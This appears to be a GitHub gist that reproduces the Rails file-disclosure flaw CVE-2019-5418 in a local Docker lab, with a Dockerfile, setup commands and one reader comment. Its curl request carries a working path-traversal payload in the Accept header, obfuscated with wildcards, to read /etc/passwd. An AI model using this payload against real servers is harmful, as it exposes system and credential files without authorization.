Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2019-5418 Demo

CVE-2019-5418 Demo

Build Docker container: Dockerfile

FROM ruby:2.5
RUN apt-get update -qq && apt-get install -y nodejs postgresql-client
RUN mkdir /myapp
WORKDIR /myapp
COPY Gemfile /myapp/Gemfile
COPY Gemfile.lock /myapp/Gemfile.lock
RUN bundle install
COPY . /myapp

# Add a script to be executed every time the container starts.
COPY entrypoint.sh /usr/bin/
RUN chmod +x /usr/bin/entrypoint.sh
ENTRYPOINT ["entrypoint.sh"]
EXPOSE 3000

# Start the main process.
CMD ["rails", "server", "-b", "0.0.0.0"]

Setup docker container

docker build -t rails:CVE-2019-5418 .
docker run -ti --rm -v `pwd`:/myapp -p 3000:3000 rails:CVE-2019-5418 /bin/bash
git clone https://github.com/mpgn/CVE-2019-5418.git
cd CVE-2019-5418/demo/
sed -i -e "s/^gem 'rails'.*/gem 'rails', '5.2.1'/" -e "s/^ruby '2.5.1'$/ruby '2.5.5'/" Gemfile
bundle install
bundle update
bundle exec rails s -p 3000 -b '0.0.0.0'

To demonstrate vulnerability

curl -i -s -k  -X $'GET' \
    -H $'Host: 127.0.0.1:3000' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: .././.././.././.././.././.././.././.././.././.././e*c/./p*d{{' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Connection: close' \
    $'http://127.0.0.1:3000/chybeta'

Sources

@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Apr 5, 2019

How is this bypass technology works?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment